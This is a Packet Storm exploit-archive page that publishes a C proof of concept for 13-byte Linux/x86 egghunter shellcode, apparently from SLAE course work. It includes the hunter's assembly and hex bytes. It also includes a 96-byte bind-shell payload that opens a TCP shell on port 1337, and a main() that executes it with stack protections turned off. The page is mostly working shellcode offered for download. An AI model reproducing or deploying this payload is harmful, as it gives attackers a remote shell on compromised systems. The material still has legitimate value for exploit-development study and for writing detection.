exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Linux/x86 Egghunter Shellcode

Linux/x86 Egghunter Shellcode
Posted Jan 8, 2016
Authored by Dennis Herrmann

13 bytes small Linux/x86 egghunting shellcode.

tags | x86, shellcode
systems | linux
SHA-256 | 4238f72dd1d09bd20c2070130ad571b9678c15bf2b98e1f8d3fd350b49dcd746
Download | Favorite | View

Linux/x86 Egghunter Shellcode

Change Mirror Download
/*
 * Title: Egg Hunter PoC
 * Platform: linux/x86
 * Date: 2015-01-07
 * Author: Dennis 'dhn' Herrmann
 * Website: https://zer0-day.pw
 * Github: https://github.com/dhn/SLAE/
 * SLAE-721
 */
 
/*
 * egg_hunter.nasm
 * ---------------
 *  BITS 32
 *
 *  global _start
 *  section .text
 *
 *  EGG_SIG equ 0x4f904790   ; signature
 *
 *  _start:
 *      cdq                  ; zero out edx
 *      mov edx, EGG_SIG     ; edx = 0x4f904790
 *
 *  search_the_egg:
 *      inc eax              ; increment eax
 *      cmp DWORD [eax], edx ; compare eax with the EGG_SIG
 *      jne search_the_egg   ; if not compare jump to search_the_egg
 *
 *      jmp eax              ; jump to eax
 *
 */
#include <stdio.h>
#include <string.h>
 
/*
 * Egg Signature:
 *
 *   0x4f    0x90    0x47    0x90
 *    |       |       |       |
 * dec edi - NOP - inc edi - NOP
 */
#define EGG_SIG "\x90\x47\x90\x4f"
 
unsigned char egg_hunter[] = \
    "\x99"                   /* cdq */
    "\xba\x90\x47\x90\x4f"   /* mov edx, 0x4f904790 */
    "\x40"                   /* inc eax */
    "\x39\x10"               /* cmp DWORD PTR [eax], edx */
    "\x75\xfb"               /* jne 6 <search_the_egg> */
    "\xff\xe0";              /* jmp eax */
 
/*
 * Bind Shell TCP shellcode - 96 byte
 * bind to port: 1337
 */
unsigned char shellcode[] = \
    EGG_SIG        /* Egg Signature */
    "\x6a\x66\x58\x6a\x01\x5b\x31\xf6"
    "\x56\x6a\x01\x6a\x02\x89\xe1\xcd"
    "\x80\x5f\x97\x93\xb0\x66\x56\x66"
    "\x68\x05\x39\x66\x6a\x02\x89\xe1"
    "\x6a\x10\x51\x57\x89\xe1\xcd\x80"
    "\xb0\x66\xb3\x04\x56\x57\x89\xe1"
    "\xcd\x80\xb0\x66\xb3\x05\x56\x56"
    "\x57\x89\xe1\xcd\x80\x93\x31\xc9"
    "\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80"
    "\x75\xf8\x6a\x0b\x58\x31\xc9\x51"
    "\x68\x2f\x2f\x73\x68\x68\x2f\x62"
    "\x69\x6e\x89\xe3\x89\xca\xcd\x80";
 
/*
 * $ gcc -Wl,-z,execstack -fno-stack-protector PoC.c -o PoC
 *  [+] Egg Hunter Length:  13
 *  [+] Shellcode Length + 4 byte egg:  100
 *
 */
void main()
{
    printf("[+] Egg Hunter Length:  %d\n", strlen(egg_hunter));
    printf("[+] Shellcode Length + 4 byte egg:  %d\n", strlen(shellcode));
    int (*ret)() = (int(*)())egg_hunter;
    ret();
}

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close